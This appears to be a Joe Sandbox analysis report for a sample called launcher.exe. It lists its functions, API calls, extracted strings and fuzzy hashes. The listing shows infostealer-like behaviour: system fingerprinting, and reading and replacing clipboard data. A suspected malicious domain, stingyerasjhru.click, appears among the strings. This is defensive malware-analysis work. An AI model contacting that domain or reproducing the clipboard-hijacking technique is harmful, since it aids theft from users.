Instruction ID: 9ab065eda3250bab67ac37ff6b8e43875e10601cc13491fb4ed15c0441e35d26
Opcode Fuzzy Hash: d08596058f80da86c0768a16d3e5a38413d1da721f1895960ac2604c01ed0df2
Instruction Fuzzy Hash: AD01DFF2514700ABDB14EF28D856B1A7BE4EF08318F1189ACF959CB351D779E908CB85

Function 00B32610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B4060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B3F354,02C7BF98,?,?,?,00B3F354,00B33D4A,00B6759C,00B33D4A), ref: 00B4066D

___std_exception_copy.LIBVCRUNTIME ref: 00B32673

Strings

ios_base::badbit set, xrefs: 00B32650
bad array new length, xrefs: 00B32626

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: bad array new length$ios_base::badbit set
API String ID: 3109751735-1158432155
Opcode ID: 185a6f902fbd0d8eae5e0b29558c3c8fb3191682c9aa0f3b888382817132e888
Instruction ID: 65aca883cbd1aa138a73624606891416577eceef3e3d0213b966000d4c5f9b72
Opcode Fuzzy Hash: 185a6f902fbd0d8eae5e0b29558c3c8fb3191682c9aa0f3b888382817132e888
Instruction Fuzzy Hash: CEF058F2914300ABE710AF18D806707BBE4EB08319F01899CFA999B340D3B9D448CB92

Analysis Process: launcher.exePID: 7104, Parent PID: 4820COMMON

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	5.7%
Signature Coverage:	42.1%
Total number of Nodes:	297
Total number of Limit Nodes:	21

Executed Functions

Function 004365E0 Relevance: 25.3, APIs: 11, Strings: 3, Instructions: 788
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C,00000000), ref: 00436819
SysAllocString.OLEAUT32(83CD81D2), ref: 004368B8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004368F8
SysAllocString.OLEAUT32(83CD81D2), ref: 00436947
SysAllocString.OLEAUT32(83CD81D2), ref: 004369D7
VariantInit.OLEAUT32(09:;), ref: 00436A42
SysFreeString.OLEAUT32(?), ref: 00436D50
GetVolumeInformationW.KERNEL32(?,00000000,00000000,798B7F53,00000000,00000000,00000000,00000000), ref: 00436D88

Strings

09:;, xrefs: 00436614
C, xrefs: 00436725
, xrefs: 0043672F

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: $09:;$C
API String ID: 505850577-3421538064
Opcode ID: 42ae4a85ecf5e0b46082edec6f8b81e5004fcc6b869aad4ab074b81cd0f16134
Instruction ID: 2a578ec5aaaa84afa28a124923e687996f8f28686479a64dadb8053ce95f016e
Opcode Fuzzy Hash: 42ae4a85ecf5e0b46082edec6f8b81e5004fcc6b869aad4ab074b81cd0f16134
Instruction Fuzzy Hash: 3632FF71A083519FD710CF29C88176BBBE2EFD9314F19992DE5948B391D738D806CB8A

Function 05941000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000001), ref: 05941032
OpenClipboard.USER32(00000000), ref: 0594103C
GetClipboardData.USER32(0000000D), ref: 0594104C
GlobalLock.KERNEL32(00000000), ref: 0594105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05941090
GlobalLock.KERNEL32 ref: 059410A0
GlobalUnlock.KERNEL32 ref: 059410C1
EmptyClipboard.USER32 ref: 059410CB
SetClipboardData.USER32(0000000D), ref: 059410D6
GlobalFree.KERNEL32 ref: 059410E3
GlobalUnlock.KERNEL32(?), ref: 059410ED
CloseClipboard.USER32 ref: 059410F3
GetClipboardSequenceNumber.USER32 ref: 059410F9

Memory Dump Source

Source File: 00000003.00000002.3280342962.0000000005941000.00000020.00000800.00020000.00000000.sdmp, Offset: 05940000, based on PE: true

Associated: 00000003.00000002.3280324592.0000000005940000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3280360554.0000000005942000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5940000_launcher.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 8fa508c330ca9ad77a42fe343c1acf04bd94308097d6b381f39f5dd7216c6f04
Instruction ID: d1a74190dea584d5f6912d3f38ea1c2662a985a48467d6c4d5a10d1a525b6b69
Opcode Fuzzy Hash: 8fa508c330ca9ad77a42fe343c1acf04bd94308097d6b381f39f5dd7216c6f04
Instruction Fuzzy Hash: 1F216D396182509BDF202BB1AC0AF7A7BBCFF04A85F040428F946D6150EB618C80EFA1

Function 00411A70 Relevance: 16.5, APIs: 5, Strings: 3, Instructions: 2455COMMON

Download Yara Rule

Strings

, xrefs: 00413067, 00413026
D, xrefs: 004135B0
`, xrefs: 00412C4F

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: D$`$
API String ID: 0-4294123104
Opcode ID: 7011eb314c2af0d82d1fd6edffd993204c112257de3b5feb653470feabe6cdd3
Instruction ID: c2266adf1855adcf071ddac72f3d6aa71ecd7156813e194146ecf5d5c48e024d
Opcode Fuzzy Hash: 7011eb314c2af0d82d1fd6edffd993204c112257de3b5feb653470feabe6cdd3
Instruction Fuzzy Hash: 432314719083948FCB14DF38C94579EBFF1AB46310F0982ADD499AB3D2D7388985CB96

Function 004104AC Relevance: 11.3, APIs: 1, Strings: 5, Instructions: 797
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

z, xrefs: 004108D9
), xrefs: 00410760
g, xrefs: 00410DB9
9, xrefs: 004105C7
l, xrefs: 00410998

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: )$9$g$l$z
API String ID: 0-269890479
Opcode ID: 95003efede7f8628a8651e8586fa7b7b25d05aa9ff2a84eb7841f0c3eac0429a
Instruction ID: 00b3e4bb8b6dbe6db9aa89f56e81e469dbe5a1d6ce1b26089b308167a2126527
Opcode Fuzzy Hash: 95003efede7f8628a8651e8586fa7b7b25d05aa9ff2a84eb7841f0c3eac0429a
Instruction Fuzzy Hash: 4C62927160D7808BD364DB38C4953AFBBE2ABD5314F188A2EE5D9C73D1DA7884858B07

Function 0042B744 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#, xrefs: 0042BC0F
)I5|, xrefs: 0042BC16
', xrefs: 0042BBA3
Ju)y, xrefs: 0042BBFF

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: #$'$)I5|$Ju)y
API String ID: 0-2458968036
Opcode ID: 3158f8e05bb828521b153712de348032068f8d8856ef720763eefa78052d6a15
Instruction ID: 37230701e84990771f876615b126e5c686a43183084e131fa8db1f986283d3cc
Opcode Fuzzy Hash: 3158f8e05bb828521b153712de348032068f8d8856ef720763eefa78052d6a15
Instruction Fuzzy Hash: A0D1087161C3914BD329CF39D8903ABFBD1EF9A304F58896ED4C997381D73885058B96

Function 0042BA95 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 0042BB85

Strings

#, xrefs: 0042BC0F
)I5|, xrefs: 0042BC16
', xrefs: 0042BBA3
Ju)y, xrefs: 0042BBFF

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: #$'$)I5|$Ju)y
API String ID: 3960555810-2458968036
Opcode ID: 873ca252f9c28fd9b6f8f5caf1ac4cad8383f23a51333678ec119d4a684455ff
Instruction ID: 6f66d756f25aadc2ae172ec17aebf82ee77a47c3f50e350c9da8f851a9fc58fd
Opcode Fuzzy Hash: 873ca252f9c28fd9b6f8f5caf1ac4cad8383f23a51333678ec119d4a684455ff
Instruction Fuzzy Hash: A3B1067160C3918BD329CF39D8903EBBBD19F9A304F48496ED4C997382D7398505CB56

Function 00408640 Relevance: 7.7, APIs: 5, Instructions: 241
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408664
GetCurrentThreadId.KERNEL32 ref: 0040866E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004086C9
GetForegroundWindow.USER32 ref: 00408803
ExitProcess.KERNEL32 ref: 00408929

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 6eabe5f3c281b9e57712755c6dfc337738211d858d369b2454adbe06b4eaa96e
Instruction ID: ca123c4a7a7967581681def5bf794e4ba509904a0e5bf9eb66bbb7a976a6d0a5
Opcode Fuzzy Hash: 6eabe5f3c281b9e57712755c6dfc337738211d858d369b2454adbe06b4eaa96e
Instruction Fuzzy Hash: 257158B7B443044BD308AF69DC8536ABAD7ABC5310F0DD63EA898D7391EA7CD8058645

Function 004223B0 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 525
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042245E
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004224FA

Strings

gd, xrefs: 004229E8

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: gd
API String ID: 237503144-565856990
Opcode ID: ad788d717ceac3d039d05afae767e9d5ee62c04c6016540332475151d1a6ca75
Instruction ID: 2a1b7d4dd5d81fb0f80e583e8b45634fafd7e5d84ba9931d87d18d056751c98f
Opcode Fuzzy Hash: ad788d717ceac3d039d05afae767e9d5ee62c04c6016540332475151d1a6ca75
Instruction Fuzzy Hash: A4F121B16083409FD308DF65E95262BBBE1FFD6304F54892CE5859B391E7788905CB4B

Function 00418592 Relevance: 6.6, Strings: 5, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>%:', xrefs: 004185B7
!+, xrefs: 004185C2
<6>r, xrefs: 004185A1
8,%/, xrefs: 004185AC
W, xrefs: 004185CC

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: !+$8,%/$<6>r$>%:'$W
API String ID: 0-3126514706
Opcode ID: 076b28e303d1216bb23c2d49ddf5b085b1b434a9c139eb8dc1732c893d74ccc8
Instruction ID: 3dd83c17dc843bf8246da800a0c3f4b2f3322ea69ce38e8b8ee25e06b5e80b68
Opcode Fuzzy Hash: 076b28e303d1216bb23c2d49ddf5b085b1b434a9c139eb8dc1732c893d74ccc8
Instruction Fuzzy Hash: 5FB128B6A083409BC7248F24CC517EBB7A2FFC5314F18493EE89587391EB389951C75A

Function 004321CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00432204
GetSystemMetrics.USER32 ref: 00432213

Strings

, xrefs: 004322EA

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 9dc0baa400d61ed55d4a8b0e07f46728fff5072d456e3c7f998a28b408979122
Instruction ID: 6855254682afa618198d34ab59c7ce3c960ddf2c3771722212a8acca0b60d7fb
Opcode Fuzzy Hash: 9dc0baa400d61ed55d4a8b0e07f46728fff5072d456e3c7f998a28b408979122
Instruction Fuzzy Hash: B741A4B4D142188FCB40EFACD98569DBBF0BB88300F10856EE898E7350D730A958CF96

Function 0043B5B2 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

9., xrefs: 0043B630
9., xrefs: 0043B980

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID: 9.$9.
API String ID: 2994545307-2940951921
Opcode ID: ad8414b20a97e35f5790c456c853bf73b95e556885ef210931d1feaad0f652b0
Instruction ID: 7e14fc7253d222951fb3f57ac418904ff93c8562ec2a6da84a731a6542c3ce10
Opcode Fuzzy Hash: ad8414b20a97e35f5790c456c853bf73b95e556885ef210931d1feaad0f652b0
Instruction Fuzzy Hash: 1841AB75A057046BD718CF28DC8173A3BA3EB9A304F69A22DE141EB7E5CB345C0687C8

Function 00418BD5 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b903d7e85beb064b2c92b387839f185492fcd5ccc924cca32d15c3fc37dc9f1
Instruction ID: 372a40d6fc4f6057f9156339d6a34f31ed2c3b4a00aae687a15d2e334cec3fa3
Opcode Fuzzy Hash: 6b903d7e85beb064b2c92b387839f185492fcd5ccc924cca32d15c3fc37dc9f1
Instruction Fuzzy Hash: FD81D5B19083419FC724DF28C8917ABB7E1AF95304F14492EE499C7391EB39D981C79A

Function 0043B460 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043E5CB,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B48E

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00439A70 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00408796,8B8A7A00), ref: 00439A80

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6e7e8bdd5985d3ad04c79c805080082e42a7b90056b4924ec1a61db9109d0210
Instruction ID: dc5abcc03aff704e6bd8d86a71acf856e0f967d840e666553874459c84eb2f13
Opcode Fuzzy Hash: 6e7e8bdd5985d3ad04c79c805080082e42a7b90056b4924ec1a61db9109d0210
Instruction Fuzzy Hash: DDC01234884120AFC6049F10DC04B6ABB78AF0B201F012028B008331B2C720B808CA8C

Function 0043E780 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

@, xrefs: 0043E844

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: d8446ce39193832c009afe925cb3a633213ad36278f94cdd7f959102b1327e6c
Instruction ID: a6c5f453d95b314fd4e13c5f3a2c358a9231060937e61922208bd47b075e3014
Opcode Fuzzy Hash: d8446ce39193832c009afe925cb3a633213ad36278f94cdd7f959102b1327e6c
Instruction Fuzzy Hash: 184152B1D093108BC7189F2AD84172BB7A2FFC9328F19956DE8855B3D0E738990587C6

Function 0043D6F0 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

@, xrefs: 0043D75D

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 8409d342eeea0767b0151301ac1cfdb953918146cd9aba1650acc3773556d5a3
Instruction ID: 2d132f58915b8c9ec695fd33be6afd216340e82d8d5b0762ed548e7c6814348c
Opcode Fuzzy Hash: 8409d342eeea0767b0151301ac1cfdb953918146cd9aba1650acc3773556d5a3
Instruction Fuzzy Hash: EF3125715083049BC314DF68E8C162BBBE5EB89314F10983DE69987390D7399908CBAA

Function 00409AD0 Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

>?, xrefs: 00409B45

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: >?
API String ID: 0-3061458111
Opcode ID: 280717b7ea810cc46774c5f6cb2ccb9173a65187d2e4ec30bbda2456891429d5
Instruction ID: ba2016b502e3b112016986b72d508c04eda7d6e339ebefdd06cf2e9b87bdaf02
Opcode Fuzzy Hash: 280717b7ea810cc46774c5f6cb2ccb9173a65187d2e4ec30bbda2456891429d5
Instruction Fuzzy Hash: 7D113A382093808FD314DF6588946BBB7E2EBC3308F14963CE1D557282C775951ACB9A

Function 00421C71 Relevance: .5, Instructions: 517COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5aca5550943be473f56447381bbccc6a91095c1d4245c0841e72620e9f4d566f
Instruction ID: 646f19382516116bff0ee1859670e6c5c36c05c898c6ccd8cf43d80faccc8fb3
Opcode Fuzzy Hash: 5aca5550943be473f56447381bbccc6a91095c1d4245c0841e72620e9f4d566f
Instruction Fuzzy Hash: 7EF10F35A18212DFD714CF28EC5172AB3E1FB89715F49897CE986873A1D734EA11CB84

Function 00425560 Relevance: .4, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bac68231a2a5a2b52a7c57ef7c31b909b4b306bcc88629ecc829a897b806d7a8
Instruction ID: 20fe170d3aefcda66dc77e6320ef429174002c63d820be08141841bd176f2e10
Opcode Fuzzy Hash: bac68231a2a5a2b52a7c57ef7c31b909b4b306bcc88629ecc829a897b806d7a8
Instruction Fuzzy Hash: 8EB16A72B147209BEB14DF24A84277B7392EFD1314F99C52EE8858B381D638DD06C39A

Function 00421FAE Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cc0521e9de8ef989516b59d1b4c4764c9b20595a4ffd72f7046873bc91aaa2fa
Instruction ID: 73ff17b4549d3941965a174059cf4d84f5352edafd87841a3e1045e3991672e5
Opcode Fuzzy Hash: cc0521e9de8ef989516b59d1b4c4764c9b20595a4ffd72f7046873bc91aaa2fa
Instruction Fuzzy Hash: C951F235B18202DFE718CF28DC4162AB3B6EF89311F49897CE985972A5C735D916CB44

Function 0040D92E Relevance: 13.8, APIs: 1, Strings: 8, Instructions: 336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040D935

Strings

M^8, xrefs: 0040DC46
q, xrefs: 0040DBDB
9>?}, xrefs: 0040DA10
stingyerasjhru.click, xrefs: 0040DCD2
'$6,, xrefs: 0040DA02
9 54, xrefs: 0040DA09
dobu, xrefs: 0040DA1E
]8, xrefs: 0040DC05

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: Uninitialize
String ID: '$6,$9 54$9>?}$M^8$dobu$q$stingyerasjhru.click$]8
API String ID: 3861434553-877016940
Opcode ID: 3e7d3985b9e5930b956db680ea95a982291237b35ed464f8b5ce7fb722f0fd8b
Instruction ID: d7c32e9509a3db35be235f39aef6cc0c7440db25405c8ab73e1c3832deec55eb
Opcode Fuzzy Hash: 3e7d3985b9e5930b956db680ea95a982291237b35ed464f8b5ce7fb722f0fd8b
Instruction Fuzzy Hash: 92B126B5A087818FD719CF79C490222BFE2FF96300B1886ADC9D64B796C739E845CB54

Function 0042B247 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNEL32(00000005,?,00000100), ref: 0042B314

Strings

RQS^, xrefs: 0042B279
L_Fn, xrefs: 0042B284

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: ComputerName
String ID: L_Fn$RQS^
API String ID: 3545744682-1660048304
Opcode ID: ef7ca1e0585295d53ad23bd9a3775e50619b2afa9a1d677fe674d26d3bbfe177
Instruction ID: 918ae4a3345460a979aa6f67b5815d831a55bb1709bb8cd21d24d812eeeb5cab
Opcode Fuzzy Hash: ef7ca1e0585295d53ad23bd9a3775e50619b2afa9a1d677fe674d26d3bbfe177
Instruction Fuzzy Hash: FF21813020C7D28ADB259F35D4697BBBBD4EB97305F4408AED0CA8B292C77844098766

Function 0042B245 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNEL32(00000005,?,00000100), ref: 0042B314

Strings

RQS^, xrefs: 0042B279
L_Fn, xrefs: 0042B284

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: ComputerName
String ID: L_Fn$RQS^
API String ID: 3545744682-1660048304
Opcode ID: c00d391a0479aca5123b8b5801472ce531317a5802c4360da3731c95f979b4f5
Instruction ID: eb8f3b18cea7decb023baf3b6932d7612f4867c6b315d56930b1c7968497b3f4
Opcode Fuzzy Hash: c00d391a0479aca5123b8b5801472ce531317a5802c4360da3731c95f979b4f5
Instruction Fuzzy Hash: 7211943120D7D28BCB24DF35D4697ABB7D4DB82305F44086DD1CACB292C77844098766

Function 0040E54A Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040E54E
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E693

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 256094d601ec7afb7ee6911477012819bf8f9dd564d7da41270df65514dca4cc
Instruction ID: c95c17bd6fa21fd013e3f9dcdb519f9a2ed66fcb7260b8e8ba052556648c1cc8
Opcode Fuzzy Hash: 256094d601ec7afb7ee6911477012819bf8f9dd564d7da41270df65514dca4cc
